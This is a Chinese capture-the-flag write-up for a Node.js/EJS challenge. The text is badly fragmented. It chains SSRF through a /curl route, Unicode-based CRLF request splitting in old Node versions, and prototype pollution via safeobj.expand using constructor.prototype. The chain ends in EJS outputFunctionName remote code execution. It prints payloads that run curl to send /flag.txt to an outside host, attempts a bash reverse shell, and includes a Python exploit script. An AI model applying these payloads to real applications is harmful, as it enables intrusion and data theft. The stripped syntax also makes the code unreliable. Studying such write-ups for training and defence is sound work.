附件start.sh。

flag位置在根目录下/flag.txt

app.js(这个没多大用)

附件start.sh。

flag位置在根目录下/flag.txt

app.js(这个没多大用)

require(body-parser);//解析,用req.body获取post参数

var

app.use(bodyParser.urlencoded({extended:

false}));

app.use(express.static(path.join(__dirname,

public)));

router.post(/copy,(req,res){res.setHeader(Content-type,text/html;charsetutf-8)var

req.connection.remoteAddress;console.log(ip);var

obj

adminres.send(JSON.stringify(obj));return

}let

{if(!index.includes(__proto__)){safeobj.expand(user,

index,

req.body[index])}}res.render(index);

})router.get(/curl,

{console.error(error.message);//

消费响应数据以释放内存res1.resume();return;}res1.setEncoding(utf8);let

rawData

JSON.parse(rawData);res.end(parsedData);}

catch

{res.end(e.message);}});}).on(error,

(e)

router;初略审计代码发现和ejs相关又有常造成原型链污染的函数safeobj.expand()safeobj.expand()

user

细看源码/routes/index.js文件中/copy路由要求我们从本地127.0.0.1访问并且过滤了__proto__。

/routes/index.js文件中/curl有SSRF利用点。

思路是通过/curl路由利用CRLF以本地127.0.0.1身份向/copy发送POST请求然后打ejs污染原型链

原理见

ejs版本3.1.7都能打。

查看package.json版本是3.0.1可以原型链污染RCE。

__proto__被过滤使用constructor.prototype绕过。

实例对象foo.__proto__

类Foo.prototypeejs原型链污染的payload如下可以看作是payload模板按题目需要改一下。

{__proto__:{__proto__:{outputFunctionName:a1;

return

global.process.mainModule.constructor._load(child_process).execSync(dir);

//}}}不太确定是不是这样解释打个标记下次跟一下源码研究研究let

user

{};user的上一层就是Object这里应该是污染一次就够了一个__proto__。

payload改成

{__proto__:{outputFunctionName:a1;

return

global.process.mainModule.constructor._load(child_process).execSync(dir);

//}

obj很明显可以原型链污染。

也就是我们传入{“a.b”:“123”}会进行赋值a.b123

绕过过滤更改命令后将污染ejs的payload按上述方式转换为

{constructor.prototype.outputFunctionName:a1;return

global.process.mainModule.constructor._load(child_process).execSync(curl

/flag.txt);//

}补充一下safeobj.expand()的底层源码更好理解为什么是{constructor.prototype.outputFunctionName这样写的而不是{constructor:

{prototype:

请求时发出的请求实际上被定向到了不一样的路径这是因为NodeJS

Unicode

Nodejs的HTTP库包含了阻止CRLF的措施即如果你尝试发出一个URL路径中含有回车\r、换行\n或空格等控制字符的HTTP请求是它们会被URL编码所以正常的CRLF注入在nodejs中并不能利用。

那就用非正常的。

对于不包含主体的请求Node.js默认使用“latin1”这是一种单字节编码字符集不能表示高编号的Unicode字符所以当我们的请求路径中含有多字节编码的Unicode字符时会被截断取最低字节比如

\u0130

http.get(http://47.101.57.72:4000/\u010D\u010A/WHOAMI).output

GET

47.101.57.72:4000\r\nConnection:

close\r\n\r\n

Buffer.from(http://47.101.57.72:4000/\u{010D}\u{010A}/WHOAMI,

latin1).toString()

http://47.101.57.72:4000/\r\n/WHOAMI\u{010D}\u{010A}

string

\r\n于是就能用来做请求拆分CRLF了这就是非正常的CRLF。

GET

node版本是8.1.2满足8是存在http拆分攻击的(CRLF)。

payload

175{constructor.prototype.outputFunctionName:a1;return

global.process.mainModule.constructor._load(child_process).execSync(curl

/flag.txt);//}

print(payload)千万要注意我们请求包的Content-Length。

我这里为什么填175因为我POST数据长度173但是POST还包含了两个\n会被替换为两个\r\n所以总长度要加2。

当然自己拿捏不准长度可以把请求放burp里面burp重发器默认会自动帮你更新正确的Content-Length。

import

text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8

Accept-Language:

zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2

Accept-Encoding:

174{constructor.prototype.outputFunctionName:_tmp1;global.process.mainModule.require(child_process).exec(bash

\\bash

payload_encode(payloads)print(payloads)

requests.get(http://3000.endpoint-f4a41261f41142dfb14d60dc0361f7bc.ins.cloud.dasctf.com:81/curl?q

print(r.text)